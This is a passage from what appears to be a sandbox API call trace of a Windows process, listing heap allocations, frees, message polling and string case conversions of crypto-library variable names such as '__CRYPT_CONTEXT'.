(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0250.801] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0250.801] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.801] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0250.801] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0250.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0250.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.803] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0250.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.804] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0250.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.804] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0250.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0250.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0250.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0250.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0250.805] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0250.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.806] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0250.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0250.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0250.807] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.807] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0250.808] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0250.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 